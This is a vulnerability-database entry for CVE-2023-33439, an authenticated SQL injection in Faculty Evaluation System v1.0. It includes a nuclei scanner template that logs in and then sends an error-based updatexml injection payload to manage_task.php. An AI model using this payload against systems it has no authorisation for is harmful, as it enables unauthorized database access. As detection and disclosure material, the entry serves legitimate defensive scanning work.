Lucene search
K

Faculty Evaluation System v1.0 - SQL Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

Faculty Evaluation System v1.0 - SQL Injection vulnerability allows arbitrary SQL queries, leading to unauthorized access, data leakage, and data manipulation. Upgrade to the latest version to mitigate

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-33439
26 May 202316:15
attackerkb
CNNVD
Faculty Evaluation System SQL注入漏洞
26 May 202300:00
cnnvd
CNVD
Faculty Evaluation System SQL Injection Vulnerability (CNVD-2023-45448)
30 May 202300:00
cnvd
CVE
CVE-2023-33439
26 May 202300:00
cve
Cvelist
CVE-2023-33439
26 May 202300:00
cvelist
NVD
CVE-2023-33439
26 May 202316:15
nvd
OSV
CVE-2023-33439
26 May 202316:15
osv
Prion
Sql injection
26 May 202316:15
prion
Positive Technologies
PT-2023-24342 · Sourcecodester · Sourcecodester Faculty Evaluation System
26 May 202300:00
ptsecurity
RedhatCVE
CVE-2023-33439
23 May 202503:52
redhatcve
Rows per page
id: CVE-2023-33439

info:
  name: Faculty Evaluation System v1.0 - SQL Injection
  author: Harsh
  severity: high
  description: |
    Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/F14me7wq/bug_report/blob/main/vendors/oretnom23/faculty-evaluation-system/SQLi-1.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-33439
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-33439
    cwe-id: CWE-89
    epss-score: 0.03307
    epss-percentile: 0.87051
    cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: faculty_evaluation_system_project
    product: faculty_evaluation_system
  tags: cve,cve2023,sqli,faculty,authenticated,faculty_evaluation_system_project,vuln

http:
  - raw:
      - |
        POST /ajax.php?action=login HTTP/1.1
        Host:{{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        email={{username}}&password={{password}}&login=1
      - |
        GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1
        Host:{{Hostname}}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Fatal error:")'
          - 'contains(body, "XPATH syntax error:")'
        condition: and
# digest: 4b0a00483046022100f82e038660d1ca4cfaa40af9d832fc7068f64cef254d184b40e65df7a0f59926022100a6d8ccbdc3fdbaf57b3db7a9b85c28601a034eb1bd5c2f8877f9939fa4560afd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.2
EPSS0.03307
SSVC
22